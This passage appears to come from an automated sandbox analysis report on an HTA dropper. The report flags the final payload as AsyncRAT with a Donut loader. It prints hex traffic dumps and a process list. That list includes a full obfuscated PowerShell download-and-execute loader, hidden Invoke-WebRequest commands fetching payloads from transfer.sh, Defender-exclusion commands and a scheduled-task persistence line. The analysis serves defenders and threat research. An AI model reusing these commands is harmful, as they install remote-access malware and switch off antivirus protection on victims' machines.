                                                                                                      2024-02-15 05:28:02 UTC4096INData Raw: 7a 86 62 26 de 57 5f 2c 16 e9 7f a5 f5 d8 0f b6 95 73 d0 32 f1 9f cb 10 6b 54 52 e0 79 c3 da 43 69 d8 01 40 d6 5d 40 ca bd e2 8e 7d be 91 d0 42 10 4b 2d 65 5f 32 b9 05 12 ad b1 89 56 77 8b 80 14 6a 42 6c 4d 07 dd 72 36 46 cd bc 41 a6 4e b3 15 6f 6c 17 bd 83 a0 44 9f 98 12 de 0f 9d 47 96 ed 71 cb b6 26 48 90 86 b5 1b 49 f2 e1 fd 9f 37 7c 6d c3 1c 7f c1 d4 8a 9c 2b 41 ce 9b c4 ea 62 80 4e e8 4b ea fc 61 47 77 7e fe 50 f9 2e e8 b5 81 ef 7e eb 3d 0c 37 03 db 7c 97 03 7e 19 92 f3 d3 95 1a 98 2f f1 49 bd a0 bf 0c 04 a1 67 f7 03 74 c2 f3 2c d4 00 49 51 a6 45 a7 9c 0f 84 47 f2 32 d3 25 35 2f 33 23 b8 eb 7c 54 a2 74 3b be 6c a8 51 57 2f b0 74 3f be 82 53 ff 7f 8c 2f 82 3f aa b3 7e b0 91 8a 90 5b 41 ff 4d fa d5 05 86 f1 ea f8 6a ea ba 87 ff 73 f2 43 ac b3 66 5f 44
                                                                                                      Data Ascii: zb&W_,s2kTRyCi@]@}BK-e_2VwjBlMr6FANolDGq&HI7|m+AbNKaGw~P.~=7|~/Igt,IQEG2%5/3#|Tt;lQW/t?S/?~[AMjsCf_D
                                                                                                      2024-02-15 05:28:02 UTC4096INData Raw: 00 47 7d 2e 75 6a 7b be f8 46 2d 8e d1 5c 71 5d 7d ae bf dd 14 ea 0d a9 3c 0d 00 e4 e3 12 9a eb 61 7c 86 fa 60 a1 7d d1 f5 f5 d0 98 6a 3f 45 ce fa 32 e7 6c 18 de fd 30 a4 59 b7 8e ba a6 38 50 b5 cf 97 0e 7a 10 05 ac 56 7a 0b 8c 8a 18 c2 61 a4 88 69 0f a2 81 dd e2 ca 22 68 a4 bd c0 4f b3 e2 13 94 07 fe 9c 8d d8 97 e8 ab ae d3 7b b9 20 1d 12 5d 3c fb 4a 1c 11 d9 a1 d1 d0 b6 74 23 87 56 3b 9d 37 16 f0 0e 68 6d 78 23 b7 50 94 45 fb 6e 3a 2d 70 6c 76 8d 07 73 c8 55 e0 cf 91 08 78 1f 49 e1 41 12 49 66 05 a1 01 60 ea 48 58 82 3f d3 b6 12 84 4f ab 92 25 f5 b7 8c 0c a9 67 89 25 72 44 2a 0c 1a b9 06 1f b3 96 9a 5a 81 7f 42 97 12 88 83 38 fe da f2 f9 92 60 b9 19 fb c1 c3 61 81 7d 16 f0 e7 7c f4 18 96 ef 89 ab d7 a9 d4 30 49 2d b2 52 c9 af 78 76 da 9f 12 29 41 e1 68
                                                                                                      Data Ascii: G}.uj{F-\q]}<a|`}j?E2l0Y8PzVzai"hO{ ]<Jt#V;7hmx#PEn:-plvsUxIAIf`HX?O%g%rD*ZB8`a}|0I-Rxv)Ah
                                                                                                      2024-02-15 05:28:02 UTC4096INData Raw: a6 5e 5e dc cc b2 75 00 80 1f 2f df 3f 52 7e 46 7c f9 f5 58 fe 29 2c ff 46 4c f9 1b 22 e5 07 f3 f2 c7 4e 47 da 1f 5f 7e 1e 96 bf 05 cb 2f 8d 96 77 b9 48 76 d3 fa 86 ff a1 f2 7f 8e 94 df b3 23 ae fc 60 2c 3f 00 cb 3b a8 bc b1 62 88 04 32 c6 97 12 0d 91 bc f7 ec 05 fc 7f 71 cd b7 02 c9 cf 58 19 cd bd d8 b4 ab 6f a0 93 15 af b9 41 e4 a1 98 37 04 9c 67 09 81 82 b9 d5 c6 c2 0d 60 ff 1e 7f 68 38 28 76 0c 8e a0 a7 e1 dc ff d0 bf a7 89 75 bd 13 73 2b ce e4 f8 0e e7 43 de be 18 ab 8d 0a 70 77 b8 41 72 be f7 f0 b5 d3 c5 ba 54 53 60 79 61 be 58 37 c4 94 9f bd df fb 65 be 7a c7 3b b9 15 3f 0e ba df 9c eb 6f cc c8 57 ef 7c a7 38 60 dc 37 65 e4 67 1f f1 36 85 6a d8 a8 23 4c 9d 11 c6 95 a0 a7 0f b3 86 33 93 99 ba cc c4 46 7c e8 56 cd 76 8a 9a 18 f5 48 18 45 39 ac cd cb
                                                                                                      Data Ascii: ^^u/?R~F|X),FL"NG_~/wHv#`,?;b2qXoA7g`h8(vus+CpwArTS`yaX7ez;?oW|8`7eg6j#L3F|VvHE9
                                                                                                      2024-02-15 05:28:02 UTC4096INData Raw: f3 ef af d7 b1 6b 97 54 7a f9 54 07 36 6e b2 1b db b7 97 c9 67 83 a5 18 7a 57 04 f7 56 a3 0a 8f 63 97 a4 14 40 15 47 a8 0a dc 6f e2 3e 7d 54 52 a6 da dc db 8f 35 d7 3e d3 be 68 c7 63 1e c7 21 49 b9 33 dd ed f8 01 9a 2f c9 47 dd f2 c7 3c 4f 86 fb ad 26 e9 5a df fb 0b 7f 5f e8 71 68 92 b2 22 cb ed 08 e3 89 08 72 07 85 39 8f 02 aa ad 80 aa e4 f8 12 bf c2 84 b4 a4 4e b5 4b b8 ab e5 24 93 cf 53 e6 7a ec 33 b1 66 01 6e 0c 74 9c 67 8e 93 41 3b 2e a1 02 8b 6b 6b 94 12 0d 0c a8 30 ce 32 7d 56 3c 47 34 e2 8e 81 d3 9f 23 31 40 c2 6f 99 69 d0 f4 f4 67 54 d9 c5 b6 b8 b1 6e 2b f8 d2 73 d1 0a a6 ff f7 15 74 5a 55 80 a7 cd 54 23 13 8a 6f ed 67 2d cd b8 59 89 89 79 07 98 5a 66 62 fe f3 3d 1e ea e1 d8 f7 36 ca 3a 7c e9 66 e3 19 e2 ef b3 59 cb 6e c0 f3 5d 66 fd 84 c7 2a b3
                                                                                                      Data Ascii: kTzT6ngzWVc@Go>}TR5>hc!I3/G<O&Z_qh"r9NK$Sz3fntgA;.kk02}V<G4#1@oigTn+stZUT#og-YyZfb=6:|fYn]f*
                                                                                                      2024-02-15 05:28:02 UTC4096INData Raw: 0a 06 88 1a 08 24 9a a0 60 53 38 3c 19 7e 8e 01 f3 85 29 dc a2 cb bf bd de 64 c7 be 20 cd 6a aa 81 df 41 d6 ad 38 20 98 9a 93 0b 96 00 06 9f b7 e2 0b 1e c1 7f 1c 89 71 59 62 5c 34 6a c4 ba 1d fa 52 a3 46 63 b6 20 58 9d c8 79 dd ce 8c 97 4b d2 e2 3c c8 11 f3 f2 a9 66 d6 f0 dd 00 a3 48 20 34 42 d2 f7 f1 ba 6b 12 dc e1 86 c8 89 9f 00 a6 14 5c 0c 49 fe 10 17 4c 98 f6 b8 b7 a2 d2 0c c3 18 93 4c 7b f0 35 c4 c6 f9 67 07 c4 1a 5a 5f 26 9f 00 c0 a9 fc 7d 56 3b e8 c1 1c 9c da 58 d7 5e 6a 82 e6 ab e3 db 99 5a 87 97 1e 7c 23 c5 e3 84 dc 9b 3c c6 0d bd 5d fd 75 ef 78 e5 a8 1f 47 53 21 f0 57 d5 d9 f9 93 0c 94 af 5a 2d 18 a7 ba ca fc e7 d5 9d 0c 0f dc 38 44 d6 96 1e 12 77 43 e3 6b 12 8c e6 52 ab 22 7b df b0 9d d1 66 e5 56 25 f0 37 2b 7b 94 21 fb dc 6a ea 3e 6a 9f a7 ba
                                                                                                      Data Ascii: $`S8<~)d jA8 qYb\4jRFc XyK<fH 4Bk\ILL{5gZ_&}V;X^jZ|#<]uxGS!WZ-8DwCkR"{fV%7+{!j>j
                                                                                                      2024-02-15 05:28:02 UTC4096INData Raw: 88 32 30 3b a4 4c 9b 80 80 71 9e d4 8c 65 6c b6 d9 51 16 47 a0 72 30 14 75 cb 3c 26 1a da a3 0c 63 32 9e 80 d7 16 6d 30 8c 36 27 c6 74 93 9d 02 9d f4 72 b7 be d2 f1 1d 01 6b 0f 0c 82 f5 ff 23 36 7f 4b b1 ff 25 d8 ff 12 ac 79 0e d6 5c c6 13 88 2c ce 91 6a 42 a2 97 24 01 65 86 15 67 dd 5d c5 e2 da ab a6 3a 40 8d 54 d3 00 5b 53 3b bd f1 14 bc 54 ec f3 14 5e 06 e8 11 2a 93 a4 66 34 f1 08 c1 5e 78 42 e9 56 ed 12 0a 4e 59 9c 83 27 89 f4 c1 12 74 7e eb 78 2b 95 99 02 04 64 85 42 49 50 28 58 3c 51 4d 33 78 0a bf b7 62 35 09 92 3c c3 1a cc c7 f7 5a b0 05 de 82 c2 37 0d 70 14 c7 65 87 6d da c8 1f 58 68 52 39 69 4f 0e d4 6d 8a d1 f7 51 92 54 7d ca 5a d1 57 5c 5b d2 0b 14 5b b9 a4 17 45 47 7f 1e 9c e7 52 ae ce 73 84 77 40 bb e2 7d 87 91 a7 6c 88 ec 18 df 46 db c0 db
                                                                                                      Data Ascii: 20;LqelQGr0u<&c2m06'trk#6K%y\,jB$eg]:@T[S;T^*f4^xBVNY't~x+dBIP(X<QM3xb5<Z7pemXhR9iOmQT}ZW\[[EGRsw@}lF
                                                                                                      2024-02-15 05:28:02 UTC4096INData Raw: d8 8e 8a ab 26 a2 cd c6 44 85 c4 b5 15 b1 16 1b 22 d7 6d 07 e7 d9 ce 88 9e f3 a1 5c e0 3e 5a b1 da 31 60 3a c7 21 b7 3a d5 b4 fc 28 e3 cc 77 81 f9 b8 fd 4b 9d 61 00 d5 c6 85 3b ec 76 b9 e4 76 87 e7 a4 b9 62 2b 59 69 d2 92 8a aa 4f 19 16 0d 04 5e ed 00 c8 c5 71 9f 3b a1 a0 38 ae 65 9c 77 6b 65 73 e0 72 34 ed c8 9b 26 a9 83 64 97 3a cb 3c 4e 19 58 6c 83 45 ce 9d e2 c2 53 f3 4e 62 59 d9 1f 7c 06 00 70 ca 5b 82 b3 00 66 57 4d 3d 7a 98 76 d2 89 89 bb b4 cd 7b 99 bc c2 10 e6 90 d1 b0 c5 50 19 91 be 60 a5 86 af 8b 3c 7b 13 af aa 35 52 14 aa 3a fa 6d 49 5d 81 71 0e 40 2d c5 32 ac 52 f1 30 f5 90 c2 8f a2 d6 0b 54 9e 82 54 7e bc c1 58 99 c9 0c 86 aa e9 b6 ff d1 69 6f 51 26 a3 bd 9c 08 75 ed 3d 8d d4 15 ad b7 f5 fd 89 94 fb a5 fd 40 b9 ff 47 ff 98 05 97 e6 c8 d1 d5
                                                                                                      Data Ascii: &D"m\>Z1`:!:(wKa;vvb+YiO^q;8ewkesr4&d:<NXlESNbY|p[fWM=zv{P`<{5R:mI]q@-2R0TT~XioQ&u=@G


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.44974423.46.240.1314436892C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-15 05:28:13 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                                                      Host: armmf.adobe.com
                                                                                                      Connection: keep-alive
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                      Sec-Fetch-Dest: empty
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      If-None-Match: "78-5faa31cce96da"
                                                                                                      If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                                                      2024-02-15 05:28:13 UTC198INHTTP/1.1 304 Not Modified
                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                      Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                                                      ETag: "78-5faa31cce96da"
                                                                                                      Date: Thu, 15 Feb 2024 05:28:13 GMT
                                                                                                      Connection: close


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:06:27:52
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\p5.hta"
                                                                                                      Imagebase:0x80000
                                                                                                      File size:13'312 bytes
                                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:06:27:53
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;
                                                                                                      Imagebase:0x110000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:06:27:53
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:06:27:55
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" "
                                                                                                      Imagebase:0x240000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:06:27:55
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:06:27:55
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf"
                                                                                                      Imagebase:0x110000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:06:27:57
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:7
                                                                                                      Start time:06:27:59
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\W2.pdf
                                                                                                      Imagebase:0x7ff6bc1b0000
                                                                                                      File size:5'641'176 bytes
                                                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Target ID:8
                                                                                                      Start time:06:27:59
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/WD631pf02G/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
                                                                                                      Imagebase:0x110000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:06:28:00
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                      Imagebase:0x7ff74bb60000
                                                                                                      File size:3'581'912 bytes
                                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Target ID:10
                                                                                                      Start time:06:28:01
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1572,i,10869719346348380041,10864435701899578402,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                      Imagebase:0x7ff74bb60000
                                                                                                      File size:3'581'912 bytes
                                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Target ID:11
                                                                                                      Start time:06:28:05
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                                                                                      Imagebase:0x110000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:17
                                                                                                      Start time:06:28:25
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\msword\msword.com
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:msword.com
                                                                                                      Imagebase:0xe70000
                                                                                                      File size:503'316'480 bytes
                                                                                                      MD5 hash:4CEEDA451C97AB9A9F299CBD8D60CB0F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Go lang
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmp, Author: unknown
                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000002.2873533097.00000217627B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 26%, Virustotal, Browse
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:18
                                                                                                      Start time:06:28:31
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com'
                                                                                                      Imagebase:0x7ff788560000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:19
                                                                                                      Start time:06:28:31
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:21
                                                                                                      Start time:06:28:38
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.com'
                                                                                                      Imagebase:0x7ff788560000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:22
                                                                                                      Start time:06:28:38
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:23
                                                                                                      Start time:06:28:51
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msword.exe'
                                                                                                      Imagebase:0x7ff788560000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:24
                                                                                                      Start time:06:28:51
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:25
                                                                                                      Start time:06:29:09
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.exe'
                                                                                                      Imagebase:0x7ff788560000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:26
                                                                                                      Start time:06:29:09
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:28
                                                                                                      Start time:06:29:51
                                                                                                      Start date:15/02/2024
                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe
                                                                                                      Imagebase:0x7ff68abb0000
                                                                                                      File size:235'008 bytes
                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
